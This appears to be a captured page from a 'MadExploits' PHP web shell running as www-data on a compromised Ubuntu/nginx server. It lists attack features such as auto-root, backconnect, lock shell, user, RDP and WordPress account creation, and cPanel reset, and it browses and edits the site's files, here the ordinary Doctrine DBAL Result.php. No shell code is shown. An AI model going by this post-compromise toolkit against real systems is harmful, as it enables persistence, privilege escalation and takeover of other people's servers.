Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
vendor /
doctrine /
dbal /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
ArrayParameters
[ DIR ]
drwxrwxr-x
Cache
[ DIR ]
drwxrwxr-x
Connections
[ DIR ]
drwxrwxr-x
Driver
[ DIR ]
drwxrwxr-x
Event
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Id
[ DIR ]
drwxrwxr-x
Logging
[ DIR ]
drwxrwxr-x
Platforms
[ DIR ]
drwxrwxr-x
Portability
[ DIR ]
drwxrwxr-x
Query
[ DIR ]
drwxrwxr-x
SQL
[ DIR ]
drwxrwxr-x
Schema
[ DIR ]
drwxrwxr-x
Tools
[ DIR ]
drwxrwxr-x
Types
[ DIR ]
drwxrwxr-x
ColumnCase.php
429
B
-rw-rw-r--
Configuration.php
3.28
KB
-rw-rw-r--
Connection.php
56.63
KB
-rw-rw-r--
ConnectionException.php
969
B
-rw-rw-r--
Driver.php
1.35
KB
-rw-rw-r--
DriverManager.php
15.08
KB
-rw-rw-r--
Events.php
1.1
KB
-rw-rw-r--
Exception.php
5.08
KB
-rw-rw-r--
ExpandArrayParameters.php
3.62
KB
-rw-rw-r--
FetchMode.php
331
B
-rw-rw-r--
LockMode.php
419
B
-rw-rw-r--
ParameterType.php
982
B
-rw-rw-r--
Query.php
1.19
KB
-rw-rw-r--
Result.php
8.29
KB
-rw-rw-r--
Statement.php
6.62
KB
-rw-rw-r--
TransactionIsolationLevel.php
613
B
-rw-rw-r--
VersionAwarePlatformDriver.php
946
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Result.php
<?php declare(strict_types=1); namespace Doctrine\DBAL; use Doctrine\DBAL\Driver\Exception as DriverException; use Doctrine\DBAL\Driver\Result as DriverResult; use Doctrine\DBAL\Exception\NoKeyValue; use LogicException; use Traversable; use function array_shift; use function func_num_args; class Result { /** @var DriverResult */ private $result; /** @var Connection */ private $connection; /** * @internal The result can be only instantiated by {@link Connection} or {@link Statement}. */ public function __construct(DriverResult $result, Connection $connection) { $this->result = $result; $this->connection = $connection; } /** * Returns the next row of the result as a numeric array or FALSE if there are no more rows. * * @return list<mixed>|false * * @throws Exception */ public function fetchNumeric() { try { return $this->result->fetchNumeric(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * Returns the next row of the result as an associative array or FALSE if there are no more rows. * * @return array<string,mixed>|false * * @throws Exception */ public function fetchAssociative() { try { return $this->result->fetchAssociative(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * Returns the first value of the next row of the result or FALSE if there are no more rows. * * @return mixed|false * * @throws Exception */ public function fetchOne() { try { return $this->result->fetchOne(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * Returns an array containing all of the result rows represented as numeric arrays. * * @return list<list<mixed>> * * @throws Exception */ public function fetchAllNumeric(): array { try { return $this->result->fetchAllNumeric(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * Returns an array containing all of the result rows represented as associative arrays. * * @return list<array<string,mixed>> * * @throws Exception */ public function fetchAllAssociative(): array { try { return $this->result->fetchAllAssociative(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * Returns an array containing the values of the first column of the result. * * @return array<mixed,mixed> * * @throws Exception */ public function fetchAllKeyValue(): array { $this->ensureHasKeyValue(); $data = []; foreach ($this->fetchAllNumeric() as [$key, $value]) { $data[$key] = $value; } return $data; } /** * Returns an associative array with the keys mapped to the first column and the values being * an associative array representing the rest of the columns and their values. * * @return array<mixed,array<string,mixed>> * * @throws Exception */ public function fetchAllAssociativeIndexed(): array { $data = []; foreach ($this->fetchAllAssociative() as $row) { $data[array_shift($row)] = $row; } return $data; } /** * @return list<mixed> * * @throws Exception */ public function fetchFirstColumn(): array { try { return $this->result->fetchFirstColumn(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * @return Traversable<int,list<mixed>> * * @throws Exception */ public function iterateNumeric(): Traversable { try { while (($row = $this->result->fetchNumeric()) !== false) { yield $row; } } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * @return Traversable<int,array<string,mixed>> * * @throws Exception */ public function iterateAssociative(): Traversable { try { while (($row = $this->result->fetchAssociative()) !== false) { yield $row; } } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * {@inheritDoc} * * @throws Exception */ public function iterateKeyValue(): Traversable { $this->ensureHasKeyValue(); foreach ($this->iterateNumeric() as [$key, $value]) { yield $key => $value; } } /** * Returns an iterator over the result set with the keys mapped to the first column and the values being * an associative array representing the rest of the columns and their values. * * @return Traversable<mixed,array<string,mixed>> * * @throws Exception */ public function iterateAssociativeIndexed(): Traversable { foreach ($this->iterateAssociative() as $row) { yield array_shift($row) => $row; } } /** * @return Traversable<int,mixed> * * @throws Exception */ public function iterateColumn(): Traversable { try { while (($value = $this->result->fetchOne()) !== false) { yield $value; } } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * @throws Exception */ public function rowCount(): int { try { return $this->result->rowCount(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } /** * @throws Exception */ public function columnCount(): int { try { return $this->result->columnCount(); } catch (DriverException $e) { throw $this->connection->convertException($e); } } public function free(): void { $this->result->free(); } /** * @throws Exception */ private function ensureHasKeyValue(): void { $columnCount = $this->columnCount(); if ($columnCount < 2) { throw NoKeyValue::fromColumnCount($columnCount); } } /** * BC layer for a wide-spread use-case of old DBAL APIs * * @deprecated This API is deprecated and will be removed after 2022 * * @return mixed */ public function fetch(int $mode = FetchMode::ASSOCIATIVE) { if (func_num_args() > 1) { throw new LogicException('Only invocations with one argument are still supported by this legecy API.'); } if ($mode === FetchMode::ASSOCIATIVE) { return $this->fetchAssociative(); } if ($mode === FetchMode::NUMERIC) { return $this->fetchNumeric(); } if ($mode === FetchMode::COLUMN) { return $this->fetchOne(); } throw new LogicException('Only fetch modes declared on Doctrine\DBAL\FetchMode are supported by legacy API.'); } /** * BC layer for a wide-spread use-case of old DBAL APIs * * @deprecated This API is deprecated and will be removed after 2022 * * @return list<mixed> */ public function fetchAll(int $mode = FetchMode::ASSOCIATIVE): array { if (func_num_args() > 1) { throw new LogicException('Only invocations with one argument are still supported by this legecy API.'); } if ($mode === FetchMode::ASSOCIATIVE) { return $this->fetchAllAssociative(); } if ($mode === FetchMode::NUMERIC) { return $this->fetchAllNumeric(); } if ($mode === FetchMode::COLUMN) { return $this->fetchFirstColumn(); } throw new LogicException('Only fetch modes declared on Doctrine\DBAL\FetchMode are supported by legacy API.'); } }
Close